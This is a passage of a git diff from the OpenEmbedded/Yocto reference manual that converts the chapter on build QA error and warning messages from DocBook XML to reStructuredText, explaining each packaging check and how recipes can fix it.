+   OpenEmbedded build system to ensure that dependency is satisfied.
+   This condition is usually triggered by an
+   :term:`RDEPENDS` value being added at the packaging
+   stage rather than up front, which is usually automatic based on the
+   contents of the package. In most cases, you should change the recipe
+   to add an explicit ``RDEPENDS`` for the dependency.
+
+    
+.. _qa-check-dev-so:
+
+-  ``non -dev/-dbg/nativesdk- package contains symlink .so: <packagename> path '<path>' [dev-so]``
+
+   Symlink ``.so`` files are for development only, and should therefore
+   go into the ``-dev`` package. This situation might occur if you add
+   ``*.so*`` rather than ``*.so.*`` to a non-dev package. Change
+   :term:`FILES` (and possibly
+   :term:`PACKAGES`) such that the specified ``.so``
+   file goes into an appropriate ``-dev`` package.
+
+    
+.. _qa-check-staticdev:
+
+-  ``non -staticdev package contains static .a library: <packagename> path '<path>' [staticdev]``
+
+   Static ``.a`` library files should go into a ``-staticdev`` package.
+   Change :term:`FILES` (and possibly
+   :term:`PACKAGES`) such that the specified ``.a`` file
+   goes into an appropriate ``-staticdev`` package.
+
+    
+.. _qa-check-libdir:
+
+-  ``<packagename>: found library in wrong location [libdir]``
+
+   The specified file may have been installed into an incorrect
+   (possibly hardcoded) installation path. For example, this test will
+   catch recipes that install ``/lib/bar.so`` when ``${base_libdir}`` is
+   "lib32". Another example is when recipes install
+   ``/usr/lib64/foo.so`` when ``${libdir}`` is "/usr/lib". False
+   positives occasionally exist. For these cases add "libdir" to
+   :term:`INSANE_SKIP` for the package.
+
+    
+.. _qa-check-debug-files:
+
+-  ``non debug package contains .debug directory: <packagename> path <path> [debug-files]``
+
+   The specified package contains a ``.debug`` directory, which should
+   not appear in anything but the ``-dbg`` package. This situation might
+   occur if you add a path which contains a ``.debug`` directory and do
+   not explicitly add the ``.debug`` directory to the ``-dbg`` package.
+   If this is the case, add the ``.debug`` directory explicitly to
+   ``FILES_${PN}-dbg``. See :term:`FILES` for additional
+   information on ``FILES``.
+
+    
+.. _qa-check-arch:
+
+-  ``Architecture did not match (<machine_arch> to <file_arch>) on <file> [arch]``
+
+   By default, the OpenEmbedded build system checks the Executable and
+   Linkable Format (ELF) type, bit size, and endianness of any binaries
+   to ensure they match the target architecture. This test fails if any
+   binaries do not match the type since there would be an
+   incompatibility. The test could indicate that the wrong compiler or
+   compiler options have been used. Sometimes software, like
+   bootloaders, might need to bypass this check. If the file you receive
+   the error for is firmware that is not intended to be executed within
+   the target operating system or is intended to run on a separate
+   processor within the device, you can add "arch" to
+   :term:`INSANE_SKIP` for the package. Another
+   option is to check the :ref:`ref-tasks-compile` log
+   and verify that the compiler options being used are correct.
+
+    
+
+-  ``Bit size did not match (<machine_bits> to <file_bits>) <recipe> on <file> [arch]``
+
+   By default, the OpenEmbedded build system checks the Executable and
+   Linkable Format (ELF) type, bit size, and endianness of any binaries
+   to ensure they match the target architecture. This test fails if any
+   binaries do not match the type since there would be an
+   incompatibility. The test could indicate that the wrong compiler or
+   compiler options have been used. Sometimes software, like
+   bootloaders, might need to bypass this check. If the file you receive
+   the error for is firmware that is not intended to be executed within
+   the target operating system or is intended to run on a separate
+   processor within the device, you can add "arch" to
+   :term:`INSANE_SKIP` for the package. Another
+   option is to check the :ref:`ref-tasks-compile` log
+   and verify that the compiler options being used are correct.
+
+    
+
+-  ``Endianness did not match (<machine_endianness> to <file_endianness>) on <file> [arch]``
+
+   By default, the OpenEmbedded build system checks the Executable and
+   Linkable Format (ELF) type, bit size, and endianness of any binaries
+   to ensure they match the target architecture. This test fails if any
+   binaries do not match the type since there would be an
+   incompatibility. The test could indicate that the wrong compiler or
+   compiler options have been used. Sometimes software, like
+   bootloaders, might need to bypass this check. If the file you receive
+   the error for is firmware that is not intended to be executed within
+   the target operating system or is intended to run on a separate
+   processor within the device, you can add "arch" to
+   :term:`INSANE_SKIP` for the package. Another
+   option is to check the :ref:`ref-tasks-compile` log
+   and verify that the compiler options being used are correct.
+
+    
+.. _qa-check-textrel:
+
+-  ``ELF binary '<file>' has relocations in .text [textrel]``
+
+   The specified ELF binary contains relocations in its ``.text``
+   sections. This situation can result in a performance impact at
+   runtime.
+
+   Typically, the way to solve this performance issue is to add "-fPIC"
+   or "-fpic" to the compiler command-line options. For example, given
+   software that reads :term:`CFLAGS` when you build it,
+   you could add the following to your recipe:
+   ::
+
+      CFLAGS_append = " -fPIC "
+
+   For more information on text relocations at runtime, see
+   http://www.akkadia.org/drepper/textrelocs.html.
+
+    
+.. _qa-check-ldflags:
+
+-  ``No GNU_HASH in the elf binary: '<file>' [ldflags]``
+
+   This indicates that binaries produced when building the recipe have
+   not been linked with the :term:`LDFLAGS` options
+   provided by the build system. Check to be sure that the ``LDFLAGS``
+   variable is being passed to the linker command. A common workaround
+   for this situation is to pass in ``LDFLAGS`` using
+   :term:`TARGET_CC_ARCH` within the recipe as
+   follows:
+   ::
+
+      TARGET_CC_ARCH += "${LDFLAGS}"
+
+    
+.. _qa-check-xorg-driver-abi:
+
+-  ``Package <packagename> contains Xorg driver (<driver>) but no xorg-abi- dependencies [xorg-driver-abi]``
+
+   The specified package contains an Xorg driver, but does not have a
+   corresponding ABI package dependency. The xserver-xorg recipe
+   provides driver ABI names. All drivers should depend on the ABI
+   versions that they have been built against. Driver recipes that
+   include ``xorg-driver-input.inc`` or ``xorg-driver-video.inc`` will
+   automatically get these versions. Consequently, you should only need
+   to explicitly add dependencies to binary driver recipes.
+
+    
+.. _qa-check-infodir:
+
+-  ``The /usr/share/info/dir file is not meant to be shipped in a particular package. [infodir]``
+
+   The ``/usr/share/info/dir`` should not be packaged. Add the following
+   line to your :ref:`ref-tasks-install` task or to your
+   ``do_install_append`` within the recipe as follows:
+   ::
+
+      rm ${D}${infodir}/dir
+   
+
+.. _qa-check-symlink-to-sysroot:
+
+-  ``Symlink <path> in <packagename> points to TMPDIR [symlink-to-sysroot]``
+
+   The specified symlink points into :term:`TMPDIR` on the
+   host. Such symlinks will work on the host. However, they are clearly
+   invalid when running on the target. You should either correct the
+   symlink to use a relative path or remove the symlink.
+
+    
+.. _qa-check-la:
+
+-  ``<file> failed sanity test (workdir) in path <path> [la]``
+
+   The specified ``.la`` file contains :term:`TMPDIR`
+   paths. Any ``.la`` file containing these paths is incorrect since
+   ``libtool`` adds the correct sysroot prefix when using the files
+   automatically itself.
+
+    
+.. _qa-check-pkgconfig:
+
+-  ``<file> failed sanity test (tmpdir) in path <path> [pkgconfig]``
+
+   The specified ``.pc`` file contains
+   :term:`TMPDIR`\ ``/``\ :term:`WORKDIR`
+   paths. Any ``.pc`` file containing these paths is incorrect since
+   ``pkg-config`` itself adds the correct sysroot prefix when the files
+   are accessed.
+
+    
+.. _qa-check-debug-deps:
+
+-  ``<packagename> rdepends on <debug_packagename> [debug-deps]``
+
+   A dependency exists between the specified non-dbg package (i.e. a
+   package whose name does not end in ``-dbg``) and a package that is a
+   ``dbg`` package. The ``dbg`` packages contain debug symbols and are
+   brought in using several different methods:
+
+   -  Using the ``dbg-pkgs``
+      :term:`IMAGE_FEATURES` value.
+
+   -  Using :term:`IMAGE_INSTALL`.
+
+   -  As a dependency of another ``dbg`` package that was brought in
+      using one of the above methods.
+
+   The dependency might have been automatically added because the
+   ``dbg`` package erroneously contains files that it should not contain
+   (e.g. a non-symlink ``.so`` file) or it might have been added
+   manually (e.g. by adding to :term:`RDEPENDS`).
+
+    
+.. _qa-check-dev-deps:
+
+-  ``<packagename> rdepends on <dev_packagename> [dev-deps]``
+
+   A dependency exists between the specified non-dev package (a package
+   whose name does not end in ``-dev``) and a package that is a ``dev``
+   package. The ``dev`` packages contain development headers and are
+   usually brought in using several different methods:
+
+   -  Using the ``dev-pkgs``
+      :term:`IMAGE_FEATURES` value.
+
+   -  Using :term:`IMAGE_INSTALL`.
+
+   -  As a dependency of another ``dev`` package that was brought in
+      using one of the above methods.
+
+   The dependency might have been automatically added (because the
+   ``dev`` package erroneously contains files that it should not have
+   (e.g. a non-symlink ``.so`` file) or it might have been added
+   manually (e.g. by adding to :term:`RDEPENDS`).
+
+    
+.. _qa-check-dep-cmp:
+
+-  ``<var>_<packagename> is invalid: <comparison> (<value>)   only comparisons <, =, >, <=, and >= are allowed [dep-cmp]``
+
+   If you are adding a versioned dependency relationship to one of the
+   dependency variables (:term:`RDEPENDS`,
+   :term:`RRECOMMENDS`,
+   :term:`RSUGGESTS`,
+   :term:`RPROVIDES`,
+   :term:`RREPLACES`, or
+   :term:`RCONFLICTS`), you must only use the named
+   comparison operators. Change the versioned dependency values you are
+   adding to match those listed in the message.
+
+    
+.. _qa-check-compile-host-path:
+
+-  ``<recipename>: The compile log indicates that host include and/or library paths were used. Please check the log '<logfile>' for more information. [compile-host-path]``
+
+   The log for the :ref:`ref-tasks-compile` task
+   indicates that paths on the host were searched for files, which is
+   not appropriate when cross-compiling. Look for "is unsafe for
+   cross-compilation" or "CROSS COMPILE Badness" in the specified log
+   file.
+
+    
+.. _qa-check-install-host-path:
+
+-  ``<recipename>: The install log indicates that host include and/or library paths were used. Please check the log '<logfile>' for more information. [install-host-path]``
+
+   The log for the :ref:`ref-tasks-install` task
+   indicates that paths on the host were searched for files, which is
+   not appropriate when cross-compiling. Look for "is unsafe for
+   cross-compilation" or "CROSS COMPILE Badness" in the specified log
+   file.
+
+    
+.. _qa-check-configure-unsafe:
+
+-  ``This autoconf log indicates errors, it looked at host include and/or library paths while determining system capabilities. Rerun configure task after fixing this. The path was '<path>'``
+
+   The log for the :ref:`ref-tasks-configure` task
+   indicates that paths on the host were searched for files, which is
+   not appropriate when cross-compiling. Look for "is unsafe for
+   cross-compilation" or "CROSS COMPILE Badness" in the specified log
+   file.
+
+    
+.. _qa-check-pkgname:
+
+-  ``<packagename> doesn't match the [a-z0-9.+-]+ regex [pkgname]``
+
+   The convention within the OpenEmbedded build system (sometimes
+   enforced by the package manager itself) is to require that package
+   names are all lower case and to allow a restricted set of characters.
+   If your recipe name does not match this, or you add packages to
+   :term:`PACKAGES` that do not conform to the
+   convention, then you will receive this error. Rename your recipe. Or,
+   if you have added a non-conforming package name to ``PACKAGES``,
+   change the package name appropriately.
+
+    
+.. _qa-check-unknown-configure-option:
+
+-  ``<recipe>: configure was passed unrecognized options: <options> [unknown-configure-option]``
+
+   The configure script is reporting that the specified options are
+   unrecognized. This situation could be because the options were
+   previously valid but have been removed from the configure script. Or,
+   there was a mistake when the options were added and there is another
+   option that should be used instead. If you are unsure, consult the
+   upstream build documentation, the ``./configure --help`` output, and
+   the upstream change log or release notes. Once you have worked out
+   what the appropriate change is, you can update
+   :term:`EXTRA_OECONF`,
+   :term:`PACKAGECONFIG_CONFARGS`, or the
+   individual :term:`PACKAGECONFIG` option values
+   accordingly.
+
+    
+.. _qa-check-pn-overrides:
+
+-  ``Recipe <recipefile> has PN of "<recipename>" which is in OVERRIDES, this can result in unexpected behavior. [pn-overrides]``
+
+   The specified recipe has a name (:term:`PN`) value that
+   appears in :term:`OVERRIDES`. If a recipe is named
+   such that its ``PN`` value matches something already in ``OVERRIDES``
+   (e.g. ``PN`` happens to be the same as :term:`MACHINE`
+   or :term:`DISTRO`), it can have unexpected
+   consequences. For example, assignments such as
+   ``FILES_${PN} = "xyz"`` effectively turn into ``FILES = "xyz"``.
+   Rename your recipe (or if ``PN`` is being set explicitly, change the
+   ``PN`` value) so that the conflict does not occur. See
+   :term:`FILES` for additional information.
+
+    
+.. _qa-check-pkgvarcheck:
+
+-  ``<recipefile>: Variable <variable> is set as not being package specific, please fix this. [pkgvarcheck]``
+
+   Certain variables (:term:`RDEPENDS`,
+   :term:`RRECOMMENDS`,
+   :term:`RSUGGESTS`,
+   :term:`RCONFLICTS`,
+   :term:`RPROVIDES`,
+   :term:`RREPLACES`, :term:`FILES`,
+   ``pkg_preinst``, ``pkg_postinst``, ``pkg_prerm``, ``pkg_postrm``, and
+   :term:`ALLOW_EMPTY`) should always be set specific
+   to a package (i.e. they should be set with a package name override
+   such as ``RDEPENDS_${PN} = "value"`` rather than
+   ``RDEPENDS = "value"``). If you receive this error, correct any
+   assignments to these variables within your recipe.
+
+    
+.. _qa-check-already-stripped:
+
+-  ``File '<file>' from <recipename> was already stripped, this will prevent future debugging! [already-stripped]``
+
+   Produced binaries have already been stripped prior to the build
+   system extracting debug symbols. It is common for upstream software
+   projects to default to stripping debug symbols for output binaries.
+   In order for debugging to work on the target using ``-dbg`` packages,
+   this stripping must be disabled.
+
+   Depending on the build system used by the software being built,
+   disabling this stripping could be as easy as specifying an additional
+   configure option. If not, disabling stripping might involve patching
+   the build scripts. In the latter case, look for references to "strip"
+   or "STRIP", or the "-s" or "-S" command-line options being specified
+   on the linker command line (possibly through the compiler command
+   line if preceded with "-Wl,").
+
+   .. note::
+
+      Disabling stripping here does not mean that the final packaged
+      binaries will be unstripped. Once the OpenEmbedded build system
+      splits out debug symbols to the ``-dbg`` package, it will then
+      strip the symbols from the binaries.
+
+    
+.. _qa-check-packages-list:
+
+-  ``<packagename> is listed in PACKAGES multiple times, this leads to packaging errors. [packages-list]``
+
+   Package names must appear only once in the
+   :term:`PACKAGES` variable. You might receive this
+   error if you are attempting to add a package to ``PACKAGES`` that is
+   already in the variable's value.
+
+    
+.. _qa-check-files-invalid:
+
+-  ``FILES variable for package <packagename> contains '//' which is invalid. Attempting to fix this but you should correct the metadata. [files-invalid]``
+
+   The string "//" is invalid in a Unix path. Correct all occurrences
+   where this string appears in a :term:`FILES` variable so
+   that there is only a single "/".
+
+    
+.. _qa-check-installed-vs-shipped:
+
+-  ``<recipename>: Files/directories were installed but not shipped in any package [installed-vs-shipped]``
+
+   Files have been installed within the
+   :ref:`ref-tasks-install` task but have not been
+   included in any package by way of the :term:`FILES`
+   variable. Files that do not appear in any package cannot be present
+   in an image later on in the build process. You need to do one of the
+   following:
+
+   -  Add the files to ``FILES`` for the package you want them to appear
+      in (e.g. ``FILES_${``\ :term:`PN`\ ``}`` for the main
+      package).
+
+   -  Delete the files at the end of the ``do_install`` task if the
+      files are not needed in any package.
+
+    
+
+-  ``<oldpackage>-<oldpkgversion> was registered as shlib provider for <library>, changing it to <newpackage>-<newpkgversion> because it was built later``
+
+   This message means that both ``<oldpackage>`` and ``<newpackage>``
+   provide the specified shared library. You can expect this message
+   when a recipe has been renamed. However, if that is not the case, the
+   message might indicate that a private version of a library is being
+   erroneously picked up as the provider for a common library. If that
+   is the case, you should add the library's ``.so`` file name to
+   :term:`PRIVATE_LIBS` in the recipe that provides
+   the private version of the library.
+
+
+.. _qa-check-unlisted-pkg-lics:
+
+-  ``LICENSE_<packagename> includes licenses (<licenses>) that are not listed in LICENSE [unlisted-pkg-lics]``
+
+   The :term:`LICENSE` of the recipe should be a superset
+   of all the licenses of all packages produced by this recipe. In other
+   words, any license in ``LICENSE_*`` should also appear in
+   :term:`LICENSE`.
+
+    
+
+Configuring and Disabling QA Checks
+===================================
+
+You can configure the QA checks globally so that specific check failures
+either raise a warning or an error message, using the
+:term:`WARN_QA` and :term:`ERROR_QA`
+variables, respectively. You can also disable checks within a particular
+recipe using :term:`INSANE_SKIP`. For information on
+how to work with the QA checks, see the
+":ref:`insane.bbclass <ref-classes-insane>`" section.
+
+.. note::
+
+   Please keep in mind that the QA checks exist in order to detect real
+   or potential problems in the packaged output. So exercise caution
+   when disabling these checks.
diff --git a/documentation/ref-manual/ref-qa-checks.xml b/documentation/ref-manual/ref-qa-checks.xml
deleted file mode 100644
index 515106ae68..0000000000
--- a/documentation/ref-manual/ref-qa-checks.xml
+++ /dev/null
@@ -1,1199 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-qa-checks'>
-<title>QA Error and Warning Messages</title>
-
-<section id='qa-introduction'>
-    <title>Introduction</title>
-
-    <para>
-        When building a recipe, the OpenEmbedded build system performs
-        various QA checks on the output to ensure that common issues are
-        detected and reported.
-        Sometimes when you create a new recipe to build new software,
-        it will build with no problems.
-        When this is not the case, or when you have QA issues building any
-        software, it could take a little time to resolve them.
-    </para>
-
-    <para>
-        While it is tempting to ignore a QA message or even to
-        disable QA checks, it is best to try and resolve any
-        reported QA issues.
-        This chapter provides a list of the QA messages and brief explanations
-        of the issues you could encounter so that you can properly resolve
-        problems.
-    </para>
-
-    <para>
-        The next section provides a list of all QA error and warning
-        messages based on a default configuration.
-        Each entry provides the message or error form along with an
-        explanation.
-        <note>
-            <title>Notes</title>
-            <itemizedlist>
-                <listitem><para>
-                    At the end of each message, the name of the associated
-                    QA test (as listed in the
-                    "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
-                    section) appears within square brackets.
-                    </para></listitem>
-                <listitem><para>
-                    As mentioned, this list of error and warning messages is for
-                    QA checks only.
-                    The list does not cover all possible build errors or
-                    warnings you could encounter.
-                    </para></listitem>
-                <listitem><para>
-                    Because some QA checks are disabled by default, this list
-                    does not include all possible QA check errors and warnings.
-                    </para></listitem>
-            </itemizedlist>
-        </note>
-    </para>
-</section>
-
-<section id='qa-errors-and-warnings'>
-    <title>Errors and Warnings</title>
-
-<!--
-This section uses the <para><code> construct to enable permalinks for the
-various QA issue and warning messages.  The file templates/qa-code-permalinks.xsl
-is used to locate the construct and generate the permalink.  This solution
-leverages the fact that right now this section in the ref-manual is the only
-place is all the YP docs that uses the <para><code> construct.  If, in the
-future, that construct were to appear in the ref-manual, a generic permalink
-would be generated for the text between <code></code>.  If a better solution
-can be found then it should be implemented.  I can't find one at the moment.
--->
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-libexec'>
-                    <code>
-     &lt;packagename&gt;: &lt;path&gt; is using libexec please relocate to &lt;libexecdir&gt; [libexec]
-                    </code>
-                </para>
-
-                <para>
-                    The specified package contains files in
-                    <filename>/usr/libexec</filename> when the distro
-                    configuration uses a different path for
-                    <filename>&lt;libexecdir&gt;</filename>
-                    By default, <filename>&lt;libexecdir&gt;</filename> is
-                    <filename>$prefix/libexec</filename>.
-                    However, this default can be changed (e.g.
-                    <filename>${libdir}</filename>).
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-rpaths'>
-                    <code>
-     package &lt;packagename&gt; contains bad RPATH &lt;rpath&gt; in file &lt;file&gt; [rpaths]
-                    </code>
-                </para>
-
-                <para>
-                    The specified binary produced by the recipe contains dynamic
-                    library load paths (rpaths) that contain build system paths
-                    such as
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>,
-                    which are incorrect for the target and could potentially
-                    be a security issue.
-                    Check for bad <filename>-rpath</filename> options being
-                    passed to the linker in your
-                    <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-                    log.
-                    Depending on the build system used by the software being
-                    built, there might be a configure option to disable rpath
-                    usage completely within the build of the software.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-useless-rpaths'>
-                    <code>
-     &lt;packagename&gt;: &lt;file&gt; contains probably-redundant RPATH &lt;rpath&gt; [useless-rpaths]
-                    </code>
-                </para>
-
-                <para>
-                    The specified binary produced by the recipe contains dynamic
-                    library load paths (rpaths) that on a standard system are
-                    searched by default by the linker (e.g.
-                    <filename>/lib</filename> and <filename>/usr/lib</filename>).
-                    While these paths will not cause any breakage, they do waste
-                    space and are unnecessary.
-                    Depending on the build system used by the software being
-                    built, there might be a configure option to disable rpath
-                    usage completely within the build of the software.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-file-rdeps'>
-                    <code>
-     &lt;packagename&gt; requires &lt;files&gt;, but no providers in its RDEPENDS [file-rdeps]
-                    </code>
-                </para>
-
-                <para>
-                    A file-level dependency has been identified from the
-                    specified package on the specified files, but there is
-                    no explicit corresponding entry in
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>.
-                    If particular files are required at runtime then
-                    <filename>RDEPENDS</filename> should be declared in the
-                    recipe to ensure the packages providing them are built.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-build-deps'>
-                    <code>
-     &lt;packagename1&gt; rdepends on &lt;packagename2&gt;, but it isn't a build dependency? [build-deps]
-                    </code>
-                </para>
-
-                <para>
-                    A runtime dependency exists between the two specified
-                    packages, but there is nothing explicit within the recipe
-                    to enable the OpenEmbedded build system to ensure that
-                    dependency is satisfied.
-                    This condition is usually triggered by an
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    value being added at the packaging stage rather than up
-                    front, which is usually automatic based on the contents of
-                    the package.
-                    In most cases, you should change the recipe to add an
-                    explicit <filename>RDEPENDS</filename> for the dependency.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-dev-so'>
-                    <code>
-     non -dev/-dbg/nativesdk- package contains symlink .so: &lt;packagename&gt; path '&lt;path&gt;' [dev-so]
-                    </code>
-                </para>
-
-                <para>
-                    Symlink <filename>.so</filename> files are for development
-                    only, and should therefore go into the
-                    <filename>-dev</filename> package.
-                    This situation might occur if you add
-                    <filename>*.so*</filename> rather than
-                    <filename>*.so.*</filename> to a non-dev package.
-                    Change
-                    <link linkend='var-FILES'><filename>FILES</filename></link>
-                    (and possibly
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>)
-                    such that the specified <filename>.so</filename> file goes
-                    into an appropriate <filename>-dev</filename> package.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-staticdev'>
-                    <code>
-     non -staticdev package contains static .a library: &lt;packagename&gt; path '&lt;path&gt;' [staticdev]
-                    </code>
-                </para>
-
-                <para>
-                    Static <filename>.a</filename> library files should go into
-                    a <filename>-staticdev</filename> package.
-                    Change
-                    <link linkend='var-FILES'><filename>FILES</filename></link>
-                    (and possibly
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>)
-                    such that the specified <filename>.a</filename> file goes
-                    into an appropriate <filename>-staticdev</filename> package.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-libdir'>
-                    <code>
-     &lt;packagename&gt;: found library in wrong location [libdir]
-                    </code>
-                </para>
-
-                <para>
-                    The specified file may have been installed into an incorrect
-                    (possibly hardcoded) installation path.
-                    For example, this test will catch recipes that install
-                    <filename>/lib/bar.so</filename> when
-                    <filename>${base_libdir}</filename> is "lib32".
-                    Another example is when recipes install
-                    <filename>/usr/lib64/foo.so</filename> when
-                    <filename>${libdir}</filename> is "/usr/lib".
-                    False positives occasionally exist.
-                    For these cases add "libdir" to
-                    <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>
-                    for the package.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-debug-files'>
-                    <code>
-     non debug package contains .debug directory: &lt;packagename&gt; path &lt;path&gt; [debug-files]
-                    </code>
-                </para>
-
-                <para>
-                    The specified package contains a
-                    <filename>.debug</filename> directory, which should not
-                    appear in anything but the <filename>-dbg</filename>
-                    package.
-                    This situation might occur if you add a path which contains
-                    a <filename>.debug</filename> directory and do not
-                    explicitly add the <filename>.debug</filename> directory
-                    to the <filename>-dbg</filename> package.
-                    If this is the case, add the <filename>.debug</filename>
-                    directory explicitly to
-                    <filename>FILES_${PN}-dbg</filename>.
-                    See
-                    <link linkend='var-FILES'><filename>FILES</filename></link>
-                    for additional information on <filename>FILES</filename>.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-arch'>
-                    <code>
-     Architecture did not match (&lt;machine_arch&gt; to &lt;file_arch&gt;) on &lt;file&gt; [arch]
-                    </code>
-                </para>
-
-                <para>
-                    By default, the OpenEmbedded build system checks the
-                    Executable and Linkable Format (ELF) type, bit size, and
-                    endianness of any binaries to ensure they match the
-                    target architecture.
-                    This test fails if any binaries do not match the type since
-                    there would be an incompatibility.
-                    The test could indicate that the wrong compiler or compiler
-                    options have been used.
-                    Sometimes software, like bootloaders, might need to
-                    bypass this check.
-                    If the file you receive the error for is firmware
-                    that is not intended to be executed within the target
-                    operating system or is intended to run on a separate
-                    processor within the device, you can add "arch" to
-                    <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>
-                    for the package.
-                    Another option is to check the
-                    <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-                    log and verify that the compiler options being used
-                    are correct.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-arch-bit-size-no-match'>
-                    <code>
-     Bit size did not match (&lt;machine_bits&gt; to &lt;file_bits&gt;) &lt;recipe&gt; on &lt;file&gt; [arch]
-                    </code>
-                </para>
-
-                <para>
-                    By default, the OpenEmbedded build system checks
-                    the Executable and Linkable Format (ELF) type,
-                    bit size, and endianness of any binaries to ensure
-                    they match the target architecture.
-                    This test fails if any binaries do not match the type since
-                    there would be an incompatibility.
-                    The test could indicate that the wrong compiler or compiler
-                    options have been used.
-                    Sometimes software, like bootloaders, might need to
-                    bypass this check.
-                    If the file you receive the error for is firmware that
-                    is not intended to be executed within the target
-                    operating system or is intended to run on a separate
-                    processor within the device, you can add "arch" to
-                    <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>
-                    for the package.
-                    Another option is to check the
-                    <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-                    log and verify that the compiler options being used are
-                    correct.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-arch-endianness-no-match'>
-                    <code>
-     Endianness did not match (&lt;machine_endianness&gt; to &lt;file_endianness&gt;) on &lt;file&gt; [arch]
-                    </code>
-                </para>
-
-                <para>
-                    By default, the OpenEmbedded build system checks
-                    the Executable and Linkable Format (ELF) type, bit
-                    size, and endianness of any binaries to ensure they
-                    match the target architecture.
-                    This test fails if any binaries do not match the type since
-                    there would be an incompatibility.
-                    The test could indicate that the wrong compiler or compiler
-                    options have been used.
-                    Sometimes software, like bootloaders, might need to
-                    bypass this check.
-                    If the file you receive the error for is firmware
-                    that is not intended to be executed within the target
-                    operating system or is intended to run on a separate
-                    processor within the device, you can add "arch" to
-                    <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>
-                    for the package.
-                    Another option is to check the
-                    <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-                    log and verify that the compiler options being used
-                    are correct.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-textrel'>
-                    <code>
-     ELF binary '&lt;file&gt;' has relocations in .text [textrel]
-                    </code>
-                </para>
-
-                <para>
-                    The specified ELF binary contains relocations in its
-                    <filename>.text</filename> sections.
-                    This situation can result in a performance impact
-                    at runtime.
-                </para>
-
-                <para>
-                    Typically, the way to solve this performance issue is to
-                    add "-fPIC" or "-fpic" to the compiler command-line
-                    options.
-                    For example, given software that reads
-                    <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
-                    when you build it, you could add the following to your
-                    recipe:
-                    <literallayout class='monospaced'>
-     CFLAGS_append = " -fPIC "
-                    </literallayout>
-                </para>
-
-                <para>
-                    For more information on text relocations at runtime, see
-                    <ulink url='http://www.akkadia.org/drepper/textrelocs.html'></ulink>.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-ldflags'>
-                    <code>
-     No GNU_HASH in the elf binary: '&lt;file&gt;' [ldflags]
-                    </code>
-                </para>
-
-                <para>
-                    This indicates that binaries produced when building the
-                    recipe have not been linked with the
-                    <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
-                    options provided by the build system.
-                    Check to be sure that the <filename>LDFLAGS</filename>
-                    variable is being passed to the linker command.
-                    A common workaround for this situation is to pass in
-                    <filename>LDFLAGS</filename> using
-                    <link linkend='var-TARGET_CC_ARCH'><filename>TARGET_CC_ARCH</filename></link>
-                    within the recipe as follows:
-                    <literallayout class='monospaced'>
-     TARGET_CC_ARCH += "${LDFLAGS}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-xorg-driver-abi'>
-                    <code>
-     Package &lt;packagename&gt; contains Xorg driver (&lt;driver&gt;) but no xorg-abi- dependencies [xorg-driver-abi]
-                    </code>
-                </para>
-
-                <para>
-                    The specified package contains an Xorg driver, but does not
